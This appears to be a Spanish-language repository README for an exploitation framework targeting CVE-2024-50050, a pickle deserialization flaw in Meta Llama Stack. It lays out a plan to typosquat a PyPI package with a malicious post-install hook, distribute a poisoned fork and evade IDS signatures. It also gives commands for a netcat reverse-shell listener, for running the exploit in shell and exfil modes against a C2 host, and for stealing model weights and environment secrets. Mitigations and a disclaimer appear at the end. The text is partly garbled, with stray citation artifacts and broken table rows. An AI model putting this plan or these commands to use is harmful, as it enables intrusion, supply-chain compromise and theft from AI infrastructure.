
LlamaStack-RCE: Framework determinista de explotación y endurecimiento de la cadena de suministro [CVE-2024-50050] Enfoque en la investigación de seguridad de IA AI-SupplyChain-Poisoning: Laboratorio avanzado de manipulación de opcodes PVM e inyección ZeroMQ
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE es un marco de simulación y explotación de alta fidelidad dirigido a CVE-2024-50050, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en Meta Llama Stack. La vulnerabilidad se origina en la Deserialización Insegura dentro de la API de inferencia basada en Python, específicamente mediante el uso del módulo sobre capas de transporte ZeroMQ (0MQ).
pickleEste repositorio proporciona la cadena de ataque completa, desde el envenenamiento de la cadena de suministro upstream hasta la ejecución downstream y la exfiltración de pesos del modelo.
El núcleo del exploit apunta a la Máquina Virtual de Pickle (PVM). Al utilizar el opcode GLOBAL, podemos forzar a la PVM a importar cualquier módulo de Python disponible y ejecutar funciones arbitrarias durante el proceso de unpickling.
Vector de Ataque: ZeroMQ Socket -> Raw Byte Stream -> pickle.loads() -> RCE.
Para evadir los IDS tradicionales basados en firmas (Snort/Suricata), el framework implementa codificación polimórfica:
/bin/bash o os.system.pickle en múltiples tramas ZeroMQ para evadir la detección de anomalías basadas en volumen.El framework simula una Weaponización de Cadena de Suministro holística:
| Fase | Estrategia | Implementación Técnica |
|---|---|---|
| I: Upstream | Typosquatting | Registro de metalama-stack en PyPI con un PostInstallCommand malicioso en setup.py. |
|
| II: Distribución | Fork Envenenado | Fork de Llama Stack de alto rendimiento en GitHub con un "Intérprete Pickle Oculto" en connection.py.
|
| III: Ejecución | Disparador CI/CD | Ejecución automática durante pip install en el entorno de Jenkins/GitHub Actions del objetivo.
| | IV: Persistencia | Bomba Lógica | Stager en segundo plano de múltiples etapas para acceso C2 a largo plazo y robo de modelos.
|
.
[cite_start]├── lab_validator.py # 7-stage automated validation suite [cite: 206, 264]
[cite_start]├── exploit_cve_2024_50050.py # Main exploitation framework [cite: 138, 206]
[cite_start]├── server.py # Vulnerable Llama Stack simulation [cite: 112, 150]
[cite_start]├── setup.py # Weaponized supply chain installer [cite: 110, 206]
[cite_start]├── post_exploit.py # Data harvesting & lateral movement [cite: 210, 264]
[cite_start]└── evasion_library.py # 12+ advanced evasion methods [cite: 264]
[cite_start]python lab_validator.py # Target: 100% Pass Rate [cite: 208, 209]
nc -lvnp 4444
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]
Una explotación exitosa otorga control absoluto sobre la infraestructura de IA:
.safetensors (valorados entre $10M y $100M+)./proc/self/environ.Para mitigar CVE-2024-50050, deben aplicarse las siguientes reglas absolutas:
pickle.loads() con safetensors.torch.load_file() o msgpack con esquema estricto.ZMQ_CURVE con pares de claves pública/privada y nunca se vincule a 0.0.0.0.gVisor o Kata Containers para prevenir el escape del contenedor vía RCE.AVISO LEGAL: El uso de este framework para atacar objetivos sin autorización previa por escrito es ilegal. Se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas. El autor (Sastra_Adi_Wiguna) no acepta ninguna responsabilidad por el mal uso.
DOCUMENTO CLASIFICADO: PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 ESTADO DETERMINISTA: LISTO PARA PRODUCCIÓN (98/100)